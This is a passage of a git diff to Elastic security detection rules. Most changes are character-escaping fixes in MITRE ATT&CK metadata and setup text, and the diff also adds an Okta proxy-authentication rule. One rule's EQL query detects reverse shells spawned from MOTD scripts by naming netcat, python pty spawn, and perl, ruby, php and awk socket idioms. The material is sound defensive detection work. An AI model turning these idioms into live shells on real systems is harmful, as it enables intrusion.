{{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "process where event.type == \"start\" and event.action : (\"exec\", \"exec_event\") and\nprocess.parent.executable : (\"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\") and (\n (process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.args : (\"-i\", \"-l\")) or (process.parent.name == \"socat\" and process.parent.args : \"*exec*\"))) or\n (process.name : (\"nc\", \"ncat\", \"netcat\", \"nc.openbsd\") and process.args_count >= 3 and \n not process.args : (\"-*z*\", \"-*l*\")) or\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or \n (process.name in (\"openssl\", \"telnet\"))\n) and \nnot (process.parent.args : \"--force\" or process.args : (\"/usr/games/lolcat\", \"/usr/bin/screenfetch\"))\n", "references": [ "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd" ], @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_104.json b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_104.json index 339c873f36b..9a9943bfd48 100644 --- a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_104.json +++ b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_104.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "4ed493fc-d637-4a36-80ff-ac84937e5461", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_105.json b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_105.json index 89ba983b791..343d491e5e3 100644 --- a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_105.json +++ b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_105.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "4ed493fc-d637-4a36-80ff-ac84937e5461", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_106.json b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_106.json index 8391c921d69..997731c78ba 100644 --- a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_106.json +++ b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_106.json @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "4ed493fc-d637-4a36-80ff-ac84937e5461", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_107.json b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_107.json index 3c2ea98add9..5284d54761f 100644 --- a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_107.json +++ b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_107.json @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "4ed493fc-d637-4a36-80ff-ac84937e5461", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_108.json b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_108.json index 402ec8e210c..d7436191fcd 100644 --- a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_108.json +++ b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_108.json @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "4ed493fc-d637-4a36-80ff-ac84937e5461", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_102.json b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_102.json index bd567a0b43e..2a1e6a11463 100644 --- a/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_102.json +++ b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_102.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_103.json b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_103.json index d86ff21fd0a..952565e9d7c 100644 --- a/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_103.json +++ b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_104.json b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_104.json index 7fac70a8e52..140637190ec 100644 --- a/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_104.json +++ b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_104.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_105.json b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_105.json index a3bc6a67223..4c46467d7a6 100644 --- a/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_105.json +++ b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_105.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_102.json b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_102.json index 90a33b5bf2c..83dd53ca1bc 100644 --- a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_102.json +++ b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_102.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -66,7 +66,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -75,7 +75,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -84,7 +84,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_103.json b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_103.json index 1af3751a1ae..e0f6e517403 100644 --- a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_103.json +++ b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_103.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -64,7 +64,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -73,7 +73,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -82,7 +82,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_104.json b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_104.json index 63d9ba9afb5..ae9118c8194 100644 --- a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_104.json +++ b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_104.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -63,7 +63,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -72,7 +72,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -81,7 +81,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_105.json b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_105.json index 796ccbdb563..c3ddae0f51d 100644 --- a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_105.json +++ b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_105.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -63,7 +63,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -72,7 +72,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -81,7 +81,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_206.json b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_206.json index 383b67ea77c..494a740f89a 100644 --- a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_206.json +++ b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_206.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -63,7 +63,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -72,7 +72,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -81,7 +81,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_103.json b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_103.json index ad00c0b8700..4b845aab17f 100644 --- a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_103.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "4fe9d835-40e1-452d-8230-17c147cafad8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_104.json b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_104.json index 9c91bc8d62d..32356d92489 100644 --- a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_104.json +++ b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_104.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "4fe9d835-40e1-452d-8230-17c147cafad8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_105.json b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_105.json index 9a7026e4370..724e556caa3 100644 --- a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_105.json +++ b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_105.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "4fe9d835-40e1-452d-8230-17c147cafad8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_106.json b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_106.json index 83822854605..60570770031 100644 --- a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_106.json +++ b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_106.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "4fe9d835-40e1-452d-8230-17c147cafad8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_107.json b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_107.json index 4f03255f67b..5239992594f 100644 --- a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_107.json +++ b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_107.json @@ -47,7 +47,7 @@ ], "risk_score": 73, "rule_id": "4fe9d835-40e1-452d-8230-17c147cafad8", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/50887ba8-7ff7-11ee-a038-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/50887ba8-7ff7-11ee-a038-f661ea17fbcd_1.json index 63d050b4239..83c0e1eb171 100644 --- a/packages/security_detection_engine/kibana/security_rule/50887ba8-7ff7-11ee-a038-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/50887ba8-7ff7-11ee-a038-f661ea17fbcd_1.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/50887ba8-7ff7-11ee-a038-f661ea17fbcd_2.json b/packages/security_detection_engine/kibana/security_rule/50887ba8-7ff7-11ee-a038-f661ea17fbcd_2.json new file mode 100644 index 00000000000..fb85d789285 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/50887ba8-7ff7-11ee-a038-f661ea17fbcd_2.json @@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when Okta user authentication events are reported for multiple users with the same device token hash behind a proxy.", + "false_positives": [ + "An Okta admnistrator may be logged into multiple accounts from the same host for legitimate reasons.", + "Users may share an endpoint related to work or personal use in which separate Okta accounts are used.", + "Shared systems such as Kiosks and conference room computers may be used by multiple users." + ], + "from": "now-9m", + "index": [ + "filebeat-*", + "logs-okta*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Multiple Okta User Auth Events with Same Device Token Hash Behind a Proxy", + "note": "## Triage and analysis\n\n### Investigating Multiple Okta User Auth Events with Same Device Token Hash Behind a Proxy\n\nThis rule detects when Okta user authentication events are reported for multiple users with the same device token hash behind a proxy. This may indicate that a shared device between users, or that a user is using a proxy to access multiple accounts for password spraying.\n\n#### Possible investigation steps:\n- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields.\n- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n - Since the device is behind a proxy, the `okta.client.ip` field will not be useful for determining the actual device IP address.\n- Review the `okta.request.ip_chain` field for more information about the geographic location of the proxy.\n- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field.\n - Historical analysis should indicate if this device token hash is commonly associated with the user.\n- Review the `okta.event_type` field to determine the type of authentication event that occurred.\n - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons.\n - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying.\n- Examine the `okta.outcome.result` field to determine if the authentication was successful.\n- Review the past activities of the actor(s) involved in this action by checking their previous actions.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n - This 